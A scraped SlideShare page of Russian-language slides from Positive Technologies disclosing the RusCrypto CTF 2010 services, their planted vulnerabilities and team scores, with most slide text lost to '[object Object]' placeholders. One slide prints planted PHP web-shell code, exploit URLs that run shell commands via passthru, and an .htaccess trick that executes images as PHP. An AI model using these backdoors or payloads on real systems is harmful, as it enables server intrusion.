SlideShare ist ein Scribd-Unternehmen logo
1 von 62
РусКрипто  CTF  2010,  Full Disclosure Positive  Technologies Май, 2010 г.
План мероприятия ,[object Object],[object Object],[object Object]
Подробности подготовки и проведения CTF
РусКрипто  CTF 2010 ,[object Object],[object Object],[object Object],[object Object],[object Object]
РусКрипто  CTF 2010:  Дизайн игровой сети
РусКрипто  CTF 2010:  Как все было устроено «изнутри» ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
РусКрипто  CTF 2010:  Распределение игровой инфраструктуры
РусКрипто  CTF 2010:  Топология игровой сети
РусКрипто  CTF 2010:  Как все было устроено «изнутри» ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
РусКрипто  CTF 2010:  еще разок поблагодарим спонсоров
Заложенные уязвимости, пути их обнаружения и эксплуатации
РусКрипто  CTF 2010 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
РусКрипто  CTF 2010:  Корпоративный сайт Система Уязвимости Дополнительно Сложность Баллы Захвачен Apache/PHP/MYSQL Время жизни: 2 часа с момента начала  CTF SQL Injection  в  Insert (default error based) over Mod_Security Расположение флага известно 3-8 8 CIT, Bushwhackers,  ХакерДом Только у  [Censored]  (!!) Подбор  + File Including  в  cookie (default RFI) Apache / PHP / MYSQL Время жизни: на протяжении всего  CTF Подбор  (default information leakage) + Cross-Site Scripting Расположение флага известно 5 7 SiBears Выполнение команд на сервере Apache/PHP/MYSQL время жизни: 5 часов с момента изменения состояния Выполнение команд на сервере over unserialize() Расположение флага известно 8 10 Никто не сумел захватить флаг. Apache/PHP/MYSQL Время жизни: 2 часа с момента изменения состояния 3 back-door  over web - shell  (выполнение команд на сервере) Расположение флага известно 1 6 SiBears, CIT, Bushwhackers Apache / PHP / MYSQL  ( bonus ) Время жизни: на протяжении всего  CTF Не требуются Обнаружить архив (флаг) в картинке 1 5 Никто не сумел захватить флаг. Apache / PHP / MYSQL  ( bonus ) Время жизни: на протяжении всего  CTF Не требуются Флаг содержится в обфусцированном виде в  index . php 2 5 Никто не сумел захватить флаг.
РусКрипто  CTF 2010:  Корпоративный сайт ( st0) ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
РусКрипто  CTF 2010:  Корпоративный сайт ( st0) ,[object Object]
РусКрипто  CTF 2010:  Корпоративный сайт ( st0) ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
РусКрипто  CTF 2010:  Корпоративный сайт ( st0) ,[object Object]
РусКрипто  CTF 2010:  Корпоративный сайт ,[object Object],[object Object],[object Object]
РусКрипто  CTF 2010:  Корпоративный сайт ( st 1 ) ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
РусКрипто  CTF 2010:  Корпоративный сайт ( st 1 ) ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
РусКрипто  CTF 2010:  Корпоративный сайт ( st2)
[object Object],РусКрипто  CTF 2010:  Корпоративный сайт ( st2) … if(@$_GET['v'])include(@$_GET['v']); … http ://192.168.0.1/ bak _ index . php ? v =/ YOURFLAG . TXT … @$_REQUEST['a'])?eval($_REQUEST['h']($_REQUEST['a'])):0; … http://192.168.0.1/img.php?h=passthru&a=cat%20/YOURFLAG.TXT .htaccess AddType application/x-httpd-php .png http://192.168.0.1/fonts/footevening.png
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],РусКрипто  CTF 2010:  Корпоративный сайт
РусКрипто  CTF 2010:  Служба информирования доставщиков Система Уязвимости Дополнительно Сложность Баллы Захвачен Apache / Python / PostgreSQL Время жизни: 4 часа с момента начала  CTF Классическая SQL Injection Расположение флага известно 1 7 SiBears Apache/Python/PostgreSQL Время жизни: 5 часов с момента изменения состояния Выполнение команд на сервере over AJAX Расположение флага известно 1 10 SiBears,  ХакерДом , Bushwhackers, CIT Apache/Python/PostgreSQL (bonus) Время жизни: 1 час с момента оповещения о событии Выполнение команд на сервере over AJAX (дополнительный флаг) Флаг расположен в файле /var/mail/root 2 3 ХакерДом , CIT
РусКрипто  CTF 2010:  Служба информирования доставщиков ( st0) ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
РусКрипто  CTF 2010:  Служба информирования доставщиков ( st0) ,[object Object]
РусКрипто  CTF 2010:  Служба информирования доставщиков  (st1) ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],РусКрипто  CTF 2010:  Служба информирования доставщиков
РусКрипто  CTF 2010:  Система документооборота Система Уязвимости Дополнительно Сложность Баллы Захвачен Native HTTP Server Время жизни: 3 часа с момента начала  CTF Выход за пределы каталога Расположение флага известно 4-9 16 CIT,  ХакерДом,  SiBears Переполнение буфера Native HTTP Server Время жизни: 6 часов с момента изменения состояния Выход за пределы каталога Расположение флага известно 4-9 2 0 CIT,  ХакерДом,  SiBears Переполнение буфера Native HTTP Server (bonus) Время жизни: 3 часа с момента начала  CTF Не требуются Реверсинг, флаг вшит в демон 8 10 CIT Native HTTP Server (bonus) Время жизни: 6 часов с момента изменения состояния Не требуются (может использоваться подбор) Флаг содержится в коде (plain text) javascript 1 3 Huge Ego Team, [Censored], CIT, Bushwhackers
РусКрипто  CTF 2010:  Система документооборота ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],РусКрипто  CTF 2010:  Система документооборота
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],РусКрипто  CTF 2010:  Система документооборота
[object Object],РусКрипто  CTF 2010:  Система документооборота
[object Object],[object Object],[object Object],[object Object],РусКрипто  CTF 2010:  Система документооборота
РусКрипто  CTF 2010:  Сервис управления датчиками Система Уязвимости Дополнительно Сложность Баллы Захвачен Native TCP Server Время жизни: на протяжении всего  CTF Однобайтовое переполнение Расположение флага известно 10 28 CIT, Bushwhackers,  ХакерДом Native TCP Server (bonus) Время жизни: на протяжении всего  CTF Не требуются Реверсинг ,  флаг вшит в демон  2-4 1 2 SiBears,  ХакерДом,  CIT Native TCP Server (bonus) Время жизни: 2 часа с момента оповещения о событии Однобайтовое переполнение Флаг расположен в файле /root/.bash_history 10 3 Никто не сумел захватить флаг.
[object Object],РусКрипто  CTF 2010:  Сервис управления датчиками
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],РусКрипто  CTF 2010:  Сервис управления датчиками
[object Object],РусКрипто  CTF 2010:  Сервис управления датчиками
[object Object],[object Object],[object Object],[object Object],[object Object],РусКрипто  CTF 2010:  Сервис управления датчиками
РусКрипто  CTF 2010:  Тестовый сервер Система Уязвимости Дополнительно Сложность Баллы Захвачен Apache/PHP/MYSQL/BITRIX Время жизни: 5 часов с момента начала  CTF Подбор (множество интерфейсов) Расположение флага известно 2 3 Bushwhackers,  ХакерДом,  SiBears SQL Injection/File Including Apache/PHP/MYSQL/BITRIX Время жизни: 4 часа с момента изменения состояния Подбор , SQL Injection/File Including ( если не устранено ) Расположение флага известно 1-2 4 Bushwhackers,  ХакерДом,  CIT, SiBears, [Censored] B ack-door (выполнение команд на сервере) Apache/PHP/MYSQL/BITRIX Время жизни: 30 минут с момента оповещения о событии Подбор (если не устранено) Флаг расположен в файле /usr/home/lena/.history 1-2 2 ХакерДом B ack-door (выполнение команд на сервере)
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],РусКрипто  CTF 2010:  Тестовый сервер
[object Object],[object Object],РусКрипто  CTF 2010:  Тестовый сервер
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],РусКрипто  CTF 2010:  Тестовый сервер
[object Object],[object Object],[object Object],[object Object],РусКрипто  CTF 2010:  Тестовый сервер ,[object Object],[object Object]
РусКрипто  CTF 2010:  Коммутатор  Cisco Система Уязвимости Дополнительно Сложность Баллы Захвачен Cisco  IOS Время жизни: на протяжении всего  CTF Подбор Флаг нужно найти в nvram 5 10 Bushwhackers B ack-door (на четвертом терминале разрешен доступ с  privilege  15 без какой-либо авторизации) Cisco TCL rootkit (bonus) Время жизни: на протяжении всего CTF Найти порт Догадаться, каким образом можно получить флаг 1 3 ХакерДом
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],РусКрипто  CTF 2010:  Коммутатор  Cisco
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],РусКрипто  CTF 2010:  Коммутатор  Cisco
[object Object],РусКрипто  CTF 2010:  Коммутатор  Cisco
РусКрипто  CTF 2010:  Точка беспроводного доступа ,[object Object],[object Object],[object Object],Система Уязвимости Дополнительно Сложность Баллы Захвачен WIFI Время жизни: с момента появления до конца  CTF Взлом ключа WEP 104 бит (оборудование Cisco в стандартной конфигурации) Флаг = ключ WEP + 6 символов из  S SID 10 8 Никто не сумел захватить флаг.
РусКрипто  CTF 2010: Windows Система Уязвимости Дополнительно Сложность Баллы Захвачен Win2k3 (SP1) Время жизни: с момента появления 3 часа 20 минут Подбор (множество интерфейсов) Обезвредить SMS-вирус Обнаружить и выгрузить rootkit Найти флаг в каталоге временных файлов Подобрать пароль к архиву 3-7 10 Никто не сумел захватить флаг. Эксплуатация удаленных уязвимостей Подключиться через  SMB Найти флаг в каталоге временных файлов Подобрать пароль к архиву Win98 Время жизни: с момента появления до конца  CTF Подбор Флаг содержится в данных из PWL-файла 3 12 Никто не сумел захватить флаг.
РусКрипто  CTF 2010: Windows 2003
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],РусКрипто  CTF 2010: Windows 2003
[object Object],РусКрипто  CTF 2010: Windows 2003
[object Object],[object Object],РусКрипто  CTF 2010: Windows 98 ,[object Object],[object Object],[object Object],[object Object]
Хронология событий
РусКрипто  CTF 2010:  Хронология начисления баллов на протяжении всего соревнования
РусКрипто  CTF 2010:  Динамика начисления баллов Бледно-красным цветом выделено максимальное значение в пределах каждого 15-минутного интервала времени, синим цветом – второе по величине значение, зеленым цветом – третье по величине значение.  Максимальное количество баллов, которое каждой команде удалость заработать за 15 минут в течение всего соревнования CTF, выделено ярко-красным цветом.
РусКрипто  CTF 2010:  Доля незахваченных флагов ,[object Object]
РусКрипто  CTF 2010:  Баллы, полученные за захват флагов ,[object Object]
РусКрипто  CTF 2010:  Обеспечение доступности всех сервисов ,[object Object]
РусКрипто  CTF 2010:  Резюме ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Спасибо за внимание! Вопросы ? [email_address] http://devteev.blogspot.com/

Weitere ähnliche Inhalte

Was ist angesagt?

Web весна 2012 лекция 3
Web весна 2012 лекция 3Web весна 2012 лекция 3
Web весна 2012 лекция 3Technopark
 
Конфидент. Мардыко Евгений. "Особенности проектов по ИБ. Взгляд российского р...
Конфидент. Мардыко Евгений. "Особенности проектов по ИБ. Взгляд российского р...Конфидент. Мардыко Евгений. "Особенности проектов по ИБ. Взгляд российского р...
Конфидент. Мардыко Евгений. "Особенности проектов по ИБ. Взгляд российского р...Expolink
 
Владимир Иванов - Безопасность Unix-подобных ОС
Владимир Иванов - Безопасность Unix-подобных ОСВладимир Иванов - Безопасность Unix-подобных ОС
Владимир Иванов - Безопасность Unix-подобных ОСYandex
 
ХАРДЕНИНГ (Аринов Ильяс (determination))
ХАРДЕНИНГ (Аринов Ильяс (determination))ХАРДЕНИНГ (Аринов Ильяс (determination))
ХАРДЕНИНГ (Аринов Ильяс (determination))Kristina Pomozova
 
Бекдоры в пхп. Остаться незамеченным или проникновение без боли
Бекдоры в пхп. Остаться незамеченным или проникновение без болиБекдоры в пхп. Остаться незамеченным или проникновение без боли
Бекдоры в пхп. Остаться незамеченным или проникновение без болиdefcon_kz
 
Доктор Веб. Иванов Дмитрий. "Антивирусная безопасность. Обеспечение защиты от...
Доктор Веб. Иванов Дмитрий. "Антивирусная безопасность. Обеспечение защиты от...Доктор Веб. Иванов Дмитрий. "Антивирусная безопасность. Обеспечение защиты от...
Доктор Веб. Иванов Дмитрий. "Антивирусная безопасность. Обеспечение защиты от...Expolink
 
Некриптографическое исследование носителей православной криптографии
Некриптографическое исследование носителей  православной криптографииНекриптографическое исследование носителей  православной криптографии
Некриптографическое исследование носителей православной криптографииSergey Soldatov
 
Опенсорс-инструменты на страже безопасности бэкенда — Петр Волков
Опенсорс-инструменты на страже безопасности бэкенда — Петр ВолковОпенсорс-инструменты на страже безопасности бэкенда — Петр Волков
Опенсорс-инструменты на страже безопасности бэкенда — Петр ВолковYandex
 
Nikita Tarakanov - Kernel Pool Overflow from Windows XP to Windows 8
Nikita Tarakanov - Kernel Pool Overflow from Windows XP to Windows 8Nikita Tarakanov - Kernel Pool Overflow from Windows XP to Windows 8
Nikita Tarakanov - Kernel Pool Overflow from Windows XP to Windows 8DefconRussia
 
Анализ работы антивирусных лабораторий
Анализ работы антивирусных лабораторийАнализ работы антивирусных лабораторий
Анализ работы антивирусных лабораторийPositive Hack Days
 
2 х пр-ные серверы hp pro liant ml350
2 х пр-ные серверы hp pro liant ml3502 х пр-ные серверы hp pro liant ml350
2 х пр-ные серверы hp pro liant ml350Mikhail Ostroverkhiy
 
Безопасность онлайн-бизнеса: что нужно знать владельцу сайта
Безопасность онлайн-бизнеса: что нужно знать владельцу сайтаБезопасность онлайн-бизнеса: что нужно знать владельцу сайта
Безопасность онлайн-бизнеса: что нужно знать владельцу сайтаЯна Сергиенко
 
Технополис: Сетевой стек
Технополис: Сетевой стекТехнополис: Сетевой стек
Технополис: Сетевой стекDmitry Samsonov
 
Как защитить свой сайт, Пётр Волков, лекция в Школе вебмастеров
Как защитить свой сайт, Пётр Волков, лекция в Школе вебмастеровКак защитить свой сайт, Пётр Волков, лекция в Школе вебмастеров
Как защитить свой сайт, Пётр Волков, лекция в Школе вебмастеровYandex
 
разработка безопасного кода
разработка безопасного кодаразработка безопасного кода
разработка безопасного кодаAndrey Somsikov
 
20201021 Технополис: Сетевой стек
20201021 Технополис: Сетевой стек20201021 Технополис: Сетевой стек
20201021 Технополис: Сетевой стекDmitry Samsonov
 
Эволюция BackDoor.Flashback
Эволюция BackDoor.FlashbackЭволюция BackDoor.Flashback
Эволюция BackDoor.Flashbackhexminer
 
администрирование Solaris 10
администрирование Solaris 10администрирование Solaris 10
администрирование Solaris 10iliasv
 
Fortinet. Юрий Захаров. "Проблемы защиты корпоративного периметра"
Fortinet. Юрий Захаров. "Проблемы защиты корпоративного периметра"Fortinet. Юрий Захаров. "Проблемы защиты корпоративного периметра"
Fortinet. Юрий Захаров. "Проблемы защиты корпоративного периметра"Expolink
 

Was ist angesagt? (20)

Web весна 2012 лекция 3
Web весна 2012 лекция 3Web весна 2012 лекция 3
Web весна 2012 лекция 3
 
Конфидент. Мардыко Евгений. "Особенности проектов по ИБ. Взгляд российского р...
Конфидент. Мардыко Евгений. "Особенности проектов по ИБ. Взгляд российского р...Конфидент. Мардыко Евгений. "Особенности проектов по ИБ. Взгляд российского р...
Конфидент. Мардыко Евгений. "Особенности проектов по ИБ. Взгляд российского р...
 
Владимир Иванов - Безопасность Unix-подобных ОС
Владимир Иванов - Безопасность Unix-подобных ОСВладимир Иванов - Безопасность Unix-подобных ОС
Владимир Иванов - Безопасность Unix-подобных ОС
 
ХАРДЕНИНГ (Аринов Ильяс (determination))
ХАРДЕНИНГ (Аринов Ильяс (determination))ХАРДЕНИНГ (Аринов Ильяс (determination))
ХАРДЕНИНГ (Аринов Ильяс (determination))
 
Бекдоры в пхп. Остаться незамеченным или проникновение без боли
Бекдоры в пхп. Остаться незамеченным или проникновение без болиБекдоры в пхп. Остаться незамеченным или проникновение без боли
Бекдоры в пхп. Остаться незамеченным или проникновение без боли
 
Доктор Веб. Иванов Дмитрий. "Антивирусная безопасность. Обеспечение защиты от...
Доктор Веб. Иванов Дмитрий. "Антивирусная безопасность. Обеспечение защиты от...Доктор Веб. Иванов Дмитрий. "Антивирусная безопасность. Обеспечение защиты от...
Доктор Веб. Иванов Дмитрий. "Антивирусная безопасность. Обеспечение защиты от...
 
Vba32 rescue user guide
Vba32 rescue user guideVba32 rescue user guide
Vba32 rescue user guide
 
Некриптографическое исследование носителей православной криптографии
Некриптографическое исследование носителей  православной криптографииНекриптографическое исследование носителей  православной криптографии
Некриптографическое исследование носителей православной криптографии
 
Опенсорс-инструменты на страже безопасности бэкенда — Петр Волков
Опенсорс-инструменты на страже безопасности бэкенда — Петр ВолковОпенсорс-инструменты на страже безопасности бэкенда — Петр Волков
Опенсорс-инструменты на страже безопасности бэкенда — Петр Волков
 
Nikita Tarakanov - Kernel Pool Overflow from Windows XP to Windows 8
Nikita Tarakanov - Kernel Pool Overflow from Windows XP to Windows 8Nikita Tarakanov - Kernel Pool Overflow from Windows XP to Windows 8
Nikita Tarakanov - Kernel Pool Overflow from Windows XP to Windows 8
 
Анализ работы антивирусных лабораторий
Анализ работы антивирусных лабораторийАнализ работы антивирусных лабораторий
Анализ работы антивирусных лабораторий
 
2 х пр-ные серверы hp pro liant ml350
2 х пр-ные серверы hp pro liant ml3502 х пр-ные серверы hp pro liant ml350
2 х пр-ные серверы hp pro liant ml350
 
Безопасность онлайн-бизнеса: что нужно знать владельцу сайта
Безопасность онлайн-бизнеса: что нужно знать владельцу сайтаБезопасность онлайн-бизнеса: что нужно знать владельцу сайта
Безопасность онлайн-бизнеса: что нужно знать владельцу сайта
 
Технополис: Сетевой стек
Технополис: Сетевой стекТехнополис: Сетевой стек
Технополис: Сетевой стек
 
Как защитить свой сайт, Пётр Волков, лекция в Школе вебмастеров
Как защитить свой сайт, Пётр Волков, лекция в Школе вебмастеровКак защитить свой сайт, Пётр Волков, лекция в Школе вебмастеров
Как защитить свой сайт, Пётр Волков, лекция в Школе вебмастеров
 
разработка безопасного кода
разработка безопасного кодаразработка безопасного кода
разработка безопасного кода
 
20201021 Технополис: Сетевой стек
20201021 Технополис: Сетевой стек20201021 Технополис: Сетевой стек
20201021 Технополис: Сетевой стек
 
Эволюция BackDoor.Flashback
Эволюция BackDoor.FlashbackЭволюция BackDoor.Flashback
Эволюция BackDoor.Flashback
 
администрирование Solaris 10
администрирование Solaris 10администрирование Solaris 10
администрирование Solaris 10
 
Fortinet. Юрий Захаров. "Проблемы защиты корпоративного периметра"
Fortinet. Юрий Захаров. "Проблемы защиты корпоративного периметра"Fortinet. Юрий Захаров. "Проблемы защиты корпоративного периметра"
Fortinet. Юрий Захаров. "Проблемы защиты корпоративного периметра"
 

Ähnlich wie Ruscrypto CTF 2010 Full Disclosure

История из жизни. Демонстрация работы реального злоумышленника на примере ата...
История из жизни. Демонстрация работы реального злоумышленника на примере ата...История из жизни. Демонстрация работы реального злоумышленника на примере ата...
История из жизни. Демонстрация работы реального злоумышленника на примере ата...Dmitry Evteev
 
Cisco StealthWatch. Использование телеметрии для решения проблемы зашифрованн...
Cisco StealthWatch. Использование телеметрии для решения проблемы зашифрованн...Cisco StealthWatch. Использование телеметрии для решения проблемы зашифрованн...
Cisco StealthWatch. Использование телеметрии для решения проблемы зашифрованн...Cisco Russia
 
200 open source проектов спустя: опыт статического анализа исходного кода
200 open source проектов спустя:опыт статического анализа исходного кода200 open source проектов спустя:опыт статического анализа исходного кода
200 open source проектов спустя: опыт статического анализа исходного кодаPositive Hack Days
 
200 open source проектов спустя: опыт статического анализа исходного кода
200 open source проектов спустя: опыт статического анализа исходного кода200 open source проектов спустя: опыт статического анализа исходного кода
200 open source проектов спустя: опыт статического анализа исходного кодаAndrey Karpov
 
CC HackQuest 2010 Full Disclosure (мастер-класс)
CC HackQuest 2010 Full Disclosure (мастер-класс)CC HackQuest 2010 Full Disclosure (мастер-класс)
CC HackQuest 2010 Full Disclosure (мастер-класс)Dmitry Evteev
 
Программируемость коммутаторов для ЦОД Cisco Nexus
Программируемость коммутаторов для ЦОД Cisco NexusПрограммируемость коммутаторов для ЦОД Cisco Nexus
Программируемость коммутаторов для ЦОД Cisco NexusCisco Russia
 
Cisco Threat Defense (Cisco Stealthwatch)
Cisco Threat Defense (Cisco Stealthwatch)Cisco Threat Defense (Cisco Stealthwatch)
Cisco Threat Defense (Cisco Stealthwatch)Cisco Russia
 
Open source technologies in Microsoft cloud - MS SWIT 2014
Open source technologies in Microsoft cloud - MS SWIT 2014Open source technologies in Microsoft cloud - MS SWIT 2014
Open source technologies in Microsoft cloud - MS SWIT 2014Alexey Bokov
 
Александр Коротин. Безопасность систем управления турбинами в электроэнергетике
Александр Коротин. Безопасность систем управления турбинами в электроэнергетикеАлександр Коротин. Безопасность систем управления турбинами в электроэнергетике
Александр Коротин. Безопасность систем управления турбинами в электроэнергетикеKaspersky
 
11 лекция, петр волков
11 лекция, петр волков11 лекция, петр волков
11 лекция, петр волковkarina krew
 
ФГУП НПП "Гамма". Денис Микрюков. "Система обнаружения вторжений в автоматизи...
ФГУП НПП "Гамма". Денис Микрюков. "Система обнаружения вторжений в автоматизи...ФГУП НПП "Гамма". Денис Микрюков. "Система обнаружения вторжений в автоматизи...
ФГУП НПП "Гамма". Денис Микрюков. "Система обнаружения вторжений в автоматизи...Expolink
 
Как развернуть и настроить DFA фабрику – основные шаги
Как развернуть и настроить DFA фабрику – основные шагиКак развернуть и настроить DFA фабрику – основные шаги
Как развернуть и настроить DFA фабрику – основные шагиCisco Russia
 
Apache Storm: от простого приложения до подробностей реализации
Apache Storm: от простого приложения до подробностей реализацииApache Storm: от простого приложения до подробностей реализации
Apache Storm: от простого приложения до подробностей реализацииCEE-SEC(R)
 
Обнаружение аномальной активности в сети
Обнаружение аномальной активности в сетиОбнаружение аномальной активности в сети
Обнаружение аномальной активности в сетиCisco Russia
 
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)Dmitry Evteev
 
Аксёнов_Разработка_общей_схемы_СЗИ.pdf
Аксёнов_Разработка_общей_схемы_СЗИ.pdfАксёнов_Разработка_общей_схемы_СЗИ.pdf
Аксёнов_Разработка_общей_схемы_СЗИ.pdftrenders
 
Руководство по началу самостоятельной работы с CSPC
Руководство по началу самостоятельной работы с CSPCРуководство по началу самостоятельной работы с CSPC
Руководство по началу самостоятельной работы с CSPCCisco Russia
 
Взломать сайт на ASP.NET
Взломать сайт на ASP.NETВзломать сайт на ASP.NET
Взломать сайт на ASP.NETPositive Hack Days
 
Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...
Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...
Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...Ontico
 

Ähnlich wie Ruscrypto CTF 2010 Full Disclosure (20)

История из жизни. Демонстрация работы реального злоумышленника на примере ата...
История из жизни. Демонстрация работы реального злоумышленника на примере ата...История из жизни. Демонстрация работы реального злоумышленника на примере ата...
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
 
Cisco StealthWatch. Использование телеметрии для решения проблемы зашифрованн...
Cisco StealthWatch. Использование телеметрии для решения проблемы зашифрованн...Cisco StealthWatch. Использование телеметрии для решения проблемы зашифрованн...
Cisco StealthWatch. Использование телеметрии для решения проблемы зашифрованн...
 
200 open source проектов спустя: опыт статического анализа исходного кода
200 open source проектов спустя:опыт статического анализа исходного кода200 open source проектов спустя:опыт статического анализа исходного кода
200 open source проектов спустя: опыт статического анализа исходного кода
 
200 open source проектов спустя: опыт статического анализа исходного кода
200 open source проектов спустя: опыт статического анализа исходного кода200 open source проектов спустя: опыт статического анализа исходного кода
200 open source проектов спустя: опыт статического анализа исходного кода
 
CC HackQuest 2010 Full Disclosure (мастер-класс)
CC HackQuest 2010 Full Disclosure (мастер-класс)CC HackQuest 2010 Full Disclosure (мастер-класс)
CC HackQuest 2010 Full Disclosure (мастер-класс)
 
Программируемость коммутаторов для ЦОД Cisco Nexus
Программируемость коммутаторов для ЦОД Cisco NexusПрограммируемость коммутаторов для ЦОД Cisco Nexus
Программируемость коммутаторов для ЦОД Cisco Nexus
 
Cisco Threat Defense (Cisco Stealthwatch)
Cisco Threat Defense (Cisco Stealthwatch)Cisco Threat Defense (Cisco Stealthwatch)
Cisco Threat Defense (Cisco Stealthwatch)
 
McAfee Encryption 2015
McAfee Encryption 2015McAfee Encryption 2015
McAfee Encryption 2015
 
Open source technologies in Microsoft cloud - MS SWIT 2014
Open source technologies in Microsoft cloud - MS SWIT 2014Open source technologies in Microsoft cloud - MS SWIT 2014
Open source technologies in Microsoft cloud - MS SWIT 2014
 
Александр Коротин. Безопасность систем управления турбинами в электроэнергетике
Александр Коротин. Безопасность систем управления турбинами в электроэнергетикеАлександр Коротин. Безопасность систем управления турбинами в электроэнергетике
Александр Коротин. Безопасность систем управления турбинами в электроэнергетике
 
11 лекция, петр волков
11 лекция, петр волков11 лекция, петр волков
11 лекция, петр волков
 
ФГУП НПП "Гамма". Денис Микрюков. "Система обнаружения вторжений в автоматизи...
ФГУП НПП "Гамма". Денис Микрюков. "Система обнаружения вторжений в автоматизи...ФГУП НПП "Гамма". Денис Микрюков. "Система обнаружения вторжений в автоматизи...
ФГУП НПП "Гамма". Денис Микрюков. "Система обнаружения вторжений в автоматизи...
 
Как развернуть и настроить DFA фабрику – основные шаги
Как развернуть и настроить DFA фабрику – основные шагиКак развернуть и настроить DFA фабрику – основные шаги
Как развернуть и настроить DFA фабрику – основные шаги
 
Apache Storm: от простого приложения до подробностей реализации
Apache Storm: от простого приложения до подробностей реализацииApache Storm: от простого приложения до подробностей реализации
Apache Storm: от простого приложения до подробностей реализации
 
Обнаружение аномальной активности в сети
Обнаружение аномальной активности в сетиОбнаружение аномальной активности в сети
Обнаружение аномальной активности в сети
 
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)
 
Аксёнов_Разработка_общей_схемы_СЗИ.pdf
Аксёнов_Разработка_общей_схемы_СЗИ.pdfАксёнов_Разработка_общей_схемы_СЗИ.pdf
Аксёнов_Разработка_общей_схемы_СЗИ.pdf
 
Руководство по началу самостоятельной работы с CSPC
Руководство по началу самостоятельной работы с CSPCРуководство по началу самостоятельной работы с CSPC
Руководство по началу самостоятельной работы с CSPC
 
Взломать сайт на ASP.NET
Взломать сайт на ASP.NETВзломать сайт на ASP.NET
Взломать сайт на ASP.NET
 
Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...
Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...
Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...
 

Mehr von Dmitry Evteev

Противодействие хищению персональных данных и платежной информации в сети Инт...
Противодействие хищению персональных данных и платежной информации в сети Инт...Противодействие хищению персональных данных и платежной информации в сети Инт...
Противодействие хищению персональных данных и платежной информации в сети Инт...Dmitry Evteev
 
Уязвимости систем ДБО в 2011-2012 гг.
Уязвимости систем ДБО в 2011-2012 гг.Уязвимости систем ДБО в 2011-2012 гг.
Уязвимости систем ДБО в 2011-2012 гг.Dmitry Evteev
 
Статистика по результатам тестирований на проникновение и анализа защищенност...
Статистика по результатам тестирований на проникновение и анализа защищенност...Статистика по результатам тестирований на проникновение и анализа защищенност...
Статистика по результатам тестирований на проникновение и анализа защищенност...Dmitry Evteev
 
Реальные опасности виртуального мира.
Реальные опасности виртуального мира.Реальные опасности виртуального мира.
Реальные опасности виртуального мира.Dmitry Evteev
 
Истории из жизни. Как взламывают сети крупных организаций.
Истории из жизни. Как взламывают сети крупных организаций.Истории из жизни. Как взламывают сети крупных организаций.
Истории из жизни. Как взламывают сети крупных организаций.Dmitry Evteev
 
Демонстрация атаки на ДБО
Демонстрация атаки на ДБОДемонстрация атаки на ДБО
Демонстрация атаки на ДБОDmitry Evteev
 
Типовые проблемы безопасности банковских систем
Типовые проблемы безопасности банковских системТиповые проблемы безопасности банковских систем
Типовые проблемы безопасности банковских системDmitry Evteev
 
Услуги PT для банков
Услуги PT для банковУслуги PT для банков
Услуги PT для банковDmitry Evteev
 
PHDays 2012: Future Now
PHDays 2012: Future NowPHDays 2012: Future Now
PHDays 2012: Future NowDmitry Evteev
 
Такой (не)безопасный веб
Такой (не)безопасный вебТакой (не)безопасный веб
Такой (не)безопасный вебDmitry Evteev
 
Собираем команду хакеров
Собираем команду хакеровСобираем команду хакеров
Собираем команду хакеровDmitry Evteev
 
Тестирование на проникновение в сетях Microsoft (v.2)
Тестирование на проникновение в сетях Microsoft (v.2)Тестирование на проникновение в сетях Microsoft (v.2)
